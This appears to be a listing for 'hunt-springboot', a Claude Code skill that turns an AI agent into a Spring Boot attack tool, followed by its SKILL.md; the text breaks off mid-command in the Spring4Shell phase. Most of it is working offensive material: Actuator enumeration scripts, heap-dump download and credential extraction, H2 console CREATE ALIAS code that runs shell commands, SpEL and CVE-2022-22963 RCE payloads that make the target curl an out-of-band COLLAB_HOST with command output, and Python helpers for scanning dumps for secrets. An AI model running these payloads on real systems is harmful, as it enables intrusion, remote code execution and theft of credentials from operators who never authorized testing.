ClaudeWave
Skill · 2k repo stars · updated 4d ago

hunt-springboot

**hunt-springboot** identifies critical vulnerabilities in Spring Boot applications by targeting exposed Actuator endpoints like /actuator/heapdump, /actuator/env, and /actuator/shutdown that leak credentials and enable denial of service, plus SpEL injection vectors, H2 console RCE, and known exploits like Spring4Shell and Spring Cloud Function SPEL injection. Use this skill when fingerprinting reveals a Java Spring Boot target via X-Application-Context headers, /actuator paths, Whitelabel error pages, or Java stack traces.

Install in Claude Code

git clone --depth 1 https://github.com/elementalsouls/Claude-BugHunter /tmp/hunt-springboot && cp -r /tmp/hunt-springboot/skills/hunt-springboot ~/.claude/skills/hunt-springboot

Then open a new Claude Code session; the skill loads automatically.

SKILL.md

# HUNT-SPRINGBOOT — Spring Boot Specific Vulnerabilities

## Crown Jewel Targets

Spring Boot Actuator `/actuator/heapdump` exposed = a full JVM heap dump, i.e. every secret the process holds in memory, including the values that `/actuator/env` masks.

**Highest-value findings:**
- **`/actuator/heapdump`** — full JVM heap dump: plaintext passwords, tokens, DB credentials and private keys held anywhere in memory, unmasked
- **`/actuator/env`** — lists environment variables and Spring properties. Boot 2.x masks values whose key matches `password|secret|key|token|credential` and Boot 3.x masks every value as `******` unless `management.endpoint.env.show-values=always`, so expect property names plus anything outside that list, and read the real values from the heap dump
- **`/actuator/shutdown`** — POST only (GET gets 405) → shuts down the application (Critical availability impact); disabled unless `management.endpoint.shutdown.enabled=true`
- **H2 Console (`/h2-console`)** — DB admin UI enabled by `spring.h2.console.enabled=true` → SQL query execution → RCE via `CREATE ALIAS` with inline Java source; by default the console refuses non-local clients (`spring.h2.console.settings.web-allow-others=false`)
- **SpEL injection** — Spring Expression Language evaluated over user input: template fields, `@Value` annotations, SpEL-processed request params → RCE when the app uses a `StandardEvaluationContext` (`SimpleEvaluationContext` blocks the `T(...)` type references the payloads rely on)
- **Spring4Shell CVE-2022-22965** — Spring Framework 5.3.0 to 5.3.17 and 5.2.0 to 5.2.19 (fixed in 5.3.18 / 5.2.20, Spring Boot 2.6.6 / 2.5.12), JDK 9+, deployed as a WAR on Tomcat → RCE via data binding

---

## Phase 1 — Fingerprint Spring Boot

```bash
# Spring Boot indicators. X-Application-Context is only emitted by Spring Boot 1.x
# (dropped in 2.0), so its absence proves nothing; X-Content-Type-Options is a
# generic security header, not a Spring signal.
curl -sI "https://$TARGET/" | grep -i "x-application-context"

# Default error handling: a browser-style Accept header gets the Whitelabel page,
# anything else gets Boot's JSON error body ({"timestamp","status","error","path"}).
curl -s -H "Accept: text/html" "https://$TARGET/nonexistent" | grep -i "Whitelabel Error Page\|Spring Boot\|org.springframework"
curl -s -H "Accept: application/json" "https://$TARGET/nonexistent" | grep -iE '"(timestamp|status|error|path)"'

# Actuator root (may list available endpoints)
curl -s "https://$TARGET/actuator" | python3 -m json.tool 2>/dev/null
curl -s "https://$TARGET/actuator/" | python3 -m json.tool 2>/dev/null

# Try common base paths (management.endpoints.web.base-path in Boot 2.x/3.x,
# management.context-path in Boot 1.x)
for base in "" "/manage" "/management" "/app"; do
  STATUS=$(curl -s -o /dev/null -w "%{http_code}" "https://$TARGET$base/actuator")
  [ "$STATUS" = "200" ] && echo "[+] Actuator at: $TARGET$base/actuator"
done

# Spring Boot 1.x has no /actuator prefix: the endpoints sit at the root
for ep in env health mappings; do
  STATUS=$(curl -s -o /dev/null -w "%{http_code}" "https://$TARGET/$ep")
  [ "$STATUS" = "200" ] && echo "[+] Boot 1.x-style endpoint: $TARGET/$ep"
done
```

---

## Phase 2 — Actuator Endpoint Enumeration

```bash
BASE="https://$TARGET/actuator"   # Spring Boot 1.x: BASE="https://$TARGET" (no /actuator prefix)

# High-impact endpoints (trace/dump are Boot 1.x names, httptrace/threaddump the
# 2.x equivalents; refresh/restart come from Spring Cloud; jolokia is JMX over HTTP)
ENDPOINTS=("env" "heapdump" "threaddump" "mappings" "beans" "metrics"
           "loggers" "info" "health" "configprops" "shutdown" "trace"
           "httptrace" "auditevents" "sessions" "scheduledtasks" "caches"
           "flyway" "liquibase" "refresh" "restart" "jolokia" "dump")

for EP in "${ENDPOINTS[@]}"; do
  [ "$EP" = "heapdump" ] && continue   # checked separately below: the body is the whole heap
  # Don't trust HTTP 200 alone: Spring answers 200 with a Whitelabel/login page for
  # many paths, and a non-exposed actuator endpoint answers 404 with a JSON error
  # body, so a JSON content type alone is not proof either. Require 200 + JSON
  # + no HTML before calling it EXPOSED. One request per endpoint.
  META=$(curl -s -o /tmp/ep.body -w "%{http_code} %{content_type}" -H "Accept: application/json" "$BASE/$EP")
  STATUS=${META%% *}; CT=${META#* }
  if [ "$STATUS" = "200" ] && echo "$CT" | grep -qi "json" && ! grep -qi "Whitelabel Error Page\|<html" /tmp/ep.body; then
    echo "[+] EXPOSED: $BASE/$EP"
  elif [ "$STATUS" = "405" ]; then
    # Write endpoints (shutdown, restart, refresh) reject GET with 405 when enabled
    echo "[?] ENABLED but POST-only: $BASE/$EP"
  fi
done

# heapdump: read only the first bytes. A raw dump starts with "JAVA PROFILE 1.0.x";
# Boot 1.x serves it gzip-compressed (magic 1f 8b).
MAGIC=$(curl -s "$BASE/heapdump" | head -c 5 | od -An -tx1 | tr -d ' \n')
case "$MAGIC" in
  4a41564120) echo "[+] EXPOSED: $BASE/heapdump (raw HPROF)" ;;
  1f8b*)      echo "[+] EXPOSED: $BASE/heapdump (gzip, Boot 1.x)" ;;
esac

# Get environment variables (passwords, API keys). Boot 2.x masks values for keys
# matching password|secret|key|token|credential and Boot 3.x masks every value
# (******), so this mostly yields property names; the real values are in the heap dump.
curl -s "$BASE/env" | python3 -m json.tool 2>/dev/null | grep -i "password\|secret\|key\|token\|credential" | head -20

# Get all endpoint mappings (full API surface). Boot 2.x/3.x emit a "predicate"
# string per handler, e.g. "{GET [/api/users]}"; Boot 1.x puts the same text in the key.
curl -s "$BASE/mappings" | grep -oP '"predicate"\s*:\s*"\K[^"]+' | sort -u
curl -s "$BASE/mappings" | grep -oP '\{\[\K[^\]]+' | sort -u    # Boot 1.x keys: "{[/path],methods=[GET]}"

# Get Spring beans (lists all registered beans, reveals internal architecture)
curl -s "$BASE/beans" | python3 -m json.tool 2>/dev/null | head -100
```
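Worked example, added here and not part of the skill or the Claude-BugHunter repo: the exposure decision from the loop above and the `/actuator/env` masking caveat as offline Python, so the logic can be unit-tested against constructed responses instead of a live target. The JSON shapes follow Spring Boot's actuator output (the Boot 2.x/3.x `propertySources` layout and the flat Boot 1.x layout); the sample bodies, the `PAYMENT_API_TOKEN` value and the narrowed-sanitizer misconfiguration it illustrates are constructed for the example, not captured anywhere.

```python
"""Offline Phase 2 helpers: decide whether an actuator response really means
EXPOSED, and pull secret-looking properties (and whether they are masked)
out of an /actuator/env body."""
import json
import re

# Key regex used by Spring Boot 2.x's default env sanitizer (values become
# "******"). Boot 3.x masks every value unless show-values=always, so there the
# masked flag is simply true for everything.
SECRET_KEY_RE = re.compile(r"password|secret|key|token|credential", re.I)
MASK = "******"
HPROF_MAGIC = b"JAVA PROFILE 1.0."   # raw .hprof (Boot 2.x/3.x heapdump)
GZIP_MAGIC = b"\x1f\x8b"             # Boot 1.x serves the dump gzip-compressed
SPRING_ERROR_KEYS = {"timestamp", "status", "error", "path"}


def classify_actuator_response(status, content_type, body):
    """Classify one GET of an actuator path. body is bytes (the first KB is
    enough for heapdump). Returns 'exposed', 'exposed-heapdump',
    'enabled-post-only' or 'not-exposed'."""
    if status == 405:                    # write endpoints (shutdown, restart) reject GET
        return "enabled-post-only"
    if status != 200:
        return "not-exposed"
    if body.startswith(HPROF_MAGIC) or body.startswith(GZIP_MAGIC):
        return "exposed-heapdump"
    if "json" not in (content_type or "").lower():
        return "not-exposed"             # HTML login/Whitelabel pages come back as text/html
    text = body.decode("utf-8", "replace")
    if "Whitelabel Error Page" in text or "<html" in text.lower():
        return "not-exposed"
    try:
        doc = json.loads(text)
    except ValueError:
        return "not-exposed"
    if isinstance(doc, dict) and SPRING_ERROR_KEYS.issubset(doc):
        return "not-exposed"             # Boot's default error body served as JSON
    return "exposed"


def find_secret_properties(env_json):
    """Walk an /actuator/env body (Boot 2.x/3.x propertySources shape or the
    flat Boot 1.x shape) and return (source, key, value, masked) for every
    secret-looking key. masked=False is the interesting case."""
    doc = json.loads(env_json)
    hits = []
    sources = doc.get("propertySources")
    if isinstance(sources, list):                         # Boot 2.x / 3.x
        for ps in sources:
            for key, entry in (ps.get("properties") or {}).items():
                value = entry.get("value") if isinstance(entry, dict) else entry
                if SECRET_KEY_RE.search(key):
                    hits.append((ps.get("name"), key, value, value == MASK))
    else:                                                 # Boot 1.x: one dict per source
        for source, props in doc.items():
            if isinstance(props, dict):
                for key, value in props.items():
                    if SECRET_KEY_RE.search(key):
                        hits.append((source, key, value, value == MASK))
    return hits


# Constructed sample responses (not captured from any real target).
SAMPLE_ENV_BOOT2 = json.dumps({
    "activeProfiles": ["prod"],
    "propertySources": [
        {"name": "systemEnvironment", "properties": {
            "DB_PASSWORD": {"value": MASK, "origin": "System Environment Property \"DB_PASSWORD\""},
            # Assumed misconfiguration: keys-to-sanitize narrowed to "password", so this leaks
            "PAYMENT_API_TOKEN": {"value": "constructed-token-value",
                                  "origin": "System Environment Property \"PAYMENT_API_TOKEN\""}}},
        {"name": "applicationConfig: [classpath:/application.properties]", "properties": {
            "spring.datasource.username": {"value": "app"},
            "spring.datasource.password": {"value": MASK}}}]})
SAMPLE_ENV_BOOT1 = json.dumps({
    "profiles": [],
    "systemEnvironment": {"AWS_SECRET_ACCESS_KEY": MASK, "HOME": "/home/app"}})
SAMPLE_WHITELABEL = b"<html><body><h1>Whitelabel Error Page</h1></body></html>"
SAMPLE_404 = b'{"timestamp":"2024-01-01T00:00:00.000+00:00","status":404,"error":"Not Found","path":"/actuator/env"}'


if __name__ == "__main__":
    print(classify_actuator_response(200, "application/vnd.spring-boot.actuator.v3+json",
                                     SAMPLE_ENV_BOOT2.encode()))
    for source, key, value, masked in find_secret_properties(SAMPLE_ENV_BOOT2):
        print(f"{'masked  ' if masked else 'LEAKED  '}{source}: {key} = {value}")
```

`find_secret_properties` only reports keys the sanitizer would normally catch; a value hidden under an innocent name (a connection string, a `spring.mail.username`) still needs the full `grep` over the pretty-printed body.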

---

## Phase 3 — Heap Dump Analysis

```bash
# Download heap dump (can be large: hundreds of MB to several GB)
curl -s "$BASE/heapdump" -o /tmp/heapdump.hprof
ls -lh /tmp/heapdump.hprof
file /tmp/heapdump.hprof
# Boot 1.x serves it gzip-compressed: inflate before analysis
file /tmp/heapdump.hprof | grep -q gzip && mv /tmp/heapdump.hprof /tmp/heapdump.hprof.gz && gunzip /tmp/heapdump.hprof.gz

# Quick grep for secrets (binary file: use strings). Java 8 heaps keep String
# contents in char[] (UTF-16, written big-endian in HPROF), which plain `strings`
# misses, so scan both encodings (-e is GNU strings). JDK 9+ compact strings are
# Latin-1 byte[] and show up in the default scan.
for enc in s b; do strings -e $enc /tmp/heapdump.hprof; done > /tmp/heap.strings
grep -iE "(password|secret|apikey|api_key|token|bearer|private_key)" /tmp/heap.strings | sort -u | head -50

# More targeted extraction. Bare identifiers such as field names are HPROF
# symbol-table noise; require a separator or a key prefix.
grep -oP "(?:password|passwd|pwd)\s*[=:]\s*\S+" /tmp/heap.strings | sort -u | head -20
grep -oP "AKIA[A-Z0-9]{16}" /tmp/heap.strings | sort -u          # AWS access key IDs
grep -oP "sk_live_[A-Za-z0-9]+" /tmp/heap.strings | sort -u       # Stripe keys
grep -oP "Bearer [A-Za-z0-9._-]+" /tmp/heap.strings | sort -u     # Bearer tokens

# Use Eclipse Memory Analyzer (MAT) for deep analysis (OQL over java.lang.String
# instances, or walking from a DataSource/credentials bean to its fields)
# https://www.eclipse.org/mat/
```
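Worked example, added here and not the skill's or the Claude-BugHunter repo's code: the `strings | grep` pass above as a single offline scanner that handles the two cases the pipeline trips over, the gzip wrapper Boot 1.x puts around the dump and Java 8 `char[]` contents stored as UTF-16BE. The indicator patterns are the ones from the block above; `build_sample_heap` produces a constructed stand-in for a real dump (HPROF header plus planted strings, one per encoding), and `AKIAIOSFODNN7EXAMPLE` is AWS's documented example key ID, not a live credential.

```python
"""Phase 3 helper: scan a heap dump for secrets in the two encodings Java uses
for String contents. Plain `strings` finds JDK 9+ compact strings (Latin-1
byte[]) but misses Java 8 char[] contents, which HPROF writes as UTF-16BE."""
import gzip
import mmap
import re

HPROF_MAGIC = b"JAVA PROFILE 1.0."   # raw .hprof (Boot 2.x/3.x)
GZIP_MAGIC = b"\x1f\x8b"             # Boot 1.x serves the dump gzip-compressed

# Printable runs in each encoding; HPROF stores primitive arrays big-endian
LATIN1_RUN = re.compile(rb"[\x20-\x7e]{8,}")
UTF16BE_RUN = re.compile(rb"(?:\x00[\x20-\x7e]){8,}")

# Same indicators as the grep pipeline above, as byte patterns
SECRET_PATTERNS = {
    "kv-password": re.compile(rb"(?i)(?:password|passwd|pwd)\s*[=:]\s*[^\s\"',;&]+"),
    "aws-access-key": re.compile(rb"AKIA[A-Z0-9]{16}"),
    "stripe-live-key": re.compile(rb"sk_live_[A-Za-z0-9]+"),
    "bearer-token": re.compile(rb"Bearer [A-Za-z0-9._-]{16,}"),
}


def is_heap_dump(data):
    """True for a raw HPROF file or a gzip-wrapped one (Boot 1.x)."""
    head = bytes(data[:len(HPROF_MAGIC)])
    return head.startswith(HPROF_MAGIC) or head[:2] == GZIP_MAGIC


def open_heap(data):
    """Inflate if needed and verify the HPROF magic. Returns a bytes-like object."""
    if bytes(data[:2]) == GZIP_MAGIC:
        data = gzip.decompress(data)
    if bytes(data[:len(HPROF_MAGIC)]) != HPROF_MAGIC:
        raise ValueError("not an HPROF heap dump: %r" % bytes(data[:18]))
    return data


def candidate_strings(data):
    """Yield (encoding, ascii_bytes) for every printable run in either encoding."""
    for m in LATIN1_RUN.finditer(data):
        yield "latin1", m.group(0)
    for m in UTF16BE_RUN.finditer(data):
        yield "utf16be", m.group(0).decode("utf-16-be").encode("latin-1")


def scan_heap(data):
    """Return sorted unique (encoding, indicator, match) triples."""
    data = open_heap(data)
    found = set()
    for enc, text in candidate_strings(data):
        for name, pat in SECRET_PATTERNS.items():
            for m in pat.finditer(text):
                found.add((enc, name, m.group(0).decode("latin-1")))
    return sorted(found)


def scan_file(path):
    """Scan a downloaded dump; multi-GB raw dumps are mmap'd rather than read."""
    with open(path, "rb") as f:
        if f.read(2) == GZIP_MAGIC:
            f.seek(0)
            return scan_heap(f.read())
        with mmap.mmap(f.fileno(), 0, access=mmap.ACCESS_READ) as mm:
            return scan_heap(mm)


def build_sample_heap(compress=False):
    """Constructed stand-in for a real dump (not captured anywhere): HPROF header
    plus planted strings. compress=True mimics the Boot 1.x gzip form."""
    body = HPROF_MAGIC + b"2\x00" + b"\x00\x00\x00\x08" + b"\x00" * 8   # magic, id size, timestamp
    body += b"\x00" * 16 + b"spring.datasource.password=hunter2-constructed" + b"\x00" * 16
    body += "Authorization: Bearer eyJ.constructed.token-value".encode("utf-16-be") + b"\x00" * 8
    body += "AKIAIOSFODNN7EXAMPLE".encode("utf-16-be") + b"\x00" * 4
    body += b"sk_live_constructedStripeKey" + b"\x00" * 4
    return gzip.compress(body) if compress else body


if __name__ == "__main__":
    import sys
    hits = scan_file(sys.argv[1]) if len(sys.argv) > 1 else scan_heap(build_sample_heap())
    for enc, name, match in hits:
        print(f"[{enc}] {name}: {match}")
```

Run it as `python3 scan_heap.py /tmp/heapdump.hprof` (a hypothetical file name) on the download from the block above; with no argument it scans the constructed sample. Hits tagged `utf16be` are exactly the ones a single-byte `strings` pass would have missed.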

---

## Phase 4 — H2 Console RCE

```bash
# H2 console detection. Off unless spring.h2.console.enabled=true, and by default it
# only accepts connections from localhost (spring.h2.console.settings.web-allow-others=false),
# so a remote 200 here already means the defaults were loosened.
curl -s "https://$TARGET/h2-console" | grep -i "H2 Console\|H2 Database"
curl -s "https://$TARGET/h2" | grep -i "H2 Console"
curl -s "https://$TARGET/console" | grep -i "H2"

# Default credentials: sa / (empty password)
# JDBC URL: jdbc:h2:mem:testdb was Boot's default name before 2.3; since 2.3 the
# name is a random UUID unless spring.datasource.generate-unique-name=false, so
# read spring.datasource.url from /actuator/env or /actuator/configprops.

# If accessible, RCE via CREATE ALIAS with inline Java source. H2 compiles it with
# javax.tools, which needs a JDK (a plain JRE fails unless Janino is on the
# classpath); readAllBytes() needs Java 9+.
# SQL to execute:
# CREATE ALIAS EXEC AS $$ String exec(String cmd) throws Exception {
#   Runtime rt = Runtime.getRuntime();
#   String[] commands = {"sh","-c",cmd};
#   Process proc = rt.exec(commands);
#   return new String(proc.getInputStream().readAllBytes());
# } $$;
# CALL EXEC('id');
# Clean up afterwards:
# DROP ALIAS EXEC;
```

---

## Phase 5 — SpEL Injection

```bash
# Spring Expression Language injection in user-controlled fields.
# #{...} is a SpEL expression; ${...} is the property-placeholder syntax (and
# Thymeleaf's expression syntax, where it is also evaluated as SpEL). Probe with a
# product that cannot appear by accident: #{1337*1337} → 1787569 rather than 49.

# Common injection points:
# - Email/notification templates fed to SpEL: "Hello ${name}"
# - Custom annotation @Value("${user.input}") or a SpelExpressionParser over request data
# - Spring Security expressions (@PreAuthorize strings built from user input)
# - Spring WebFlow

# Basic SpEL test
curl -s -X POST "https://$TARGET/api/user/name" \
  -H "Content-Type: application/json" \
  -d '{"name": "#{1337*1337}"}'
# If the response reflects 1787569 → SpEL injection confirmed

# Is it the dangerous context? T(...) type references need a StandardEvaluationContext;
# the hardened SimpleEvaluationContext rejects them, so arithmetic working while this
# fails means there is no route to RCE through this sink.
curl -s -X POST "https://$TARGET/api/user/name" \
  -H "Content-Type: application/json" \
  -d '{"name": "#{T(java.lang.Math).abs(-42)}"}'

# RCE payload. exec() returns a Process, not a String, so a bare exec("id") produces
# NO visible output. Confirm via an OOB curl callback (the spawned curl makes the
# network request even though nothing is reflected). $(id|base64) is expanded by the
# target's sh: command substitution strips the trailing newline, but base64 wraps at
# 76 columns, so switch to base64 -w0 if id prints a long group list.
curl -s -X POST "https://$TARGET/api/user/name" \
  -H "Content-Type: application/json" \
  -d '{"name": "#{T(java.lang.Runtime).getRuntime().exec(new String[]{\"sh\",\"-c\",\"curl COLLAB_HOST/spel-$(id|base64)\"})}"}'

# CVE-2022-22963 — Spring Cloud Function SpEL (3.1.6, 3.2.2 and older; fixed in
# 3.1.7 / 3.2.3). The routing-expression header was evaluated with a StandardEvaluationContext.
curl -s -X POST "https://$TARGET/functionRouter" \
  -H "spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec(\"curl COLLAB_HOST/spel-rce\")" \
  -d "test"
```

---

## Phase 6 — Spring4Shell (CVE-2022-22965)

```bash
# Affects: Spring Framework 5.3.0 to 5.3.17 and 5.2.0 to 5.2.19 (plus older,
# unsupported branches); fixed in 5.3.18 / 5.2.20 (Spring Boot 2.6.6 / 2.5.12).
# Requires: JDK 9+ (Class.getModule(), the start of the class.module.classLoader
# chain, does not exist on JDK 8) and the app deployed as a WAR on Tomcat; the
# published exploit does not work against the default executable jar.

# Detection: does the app accept class.* parameters?
curl -s "https://$TARGET/api/use
```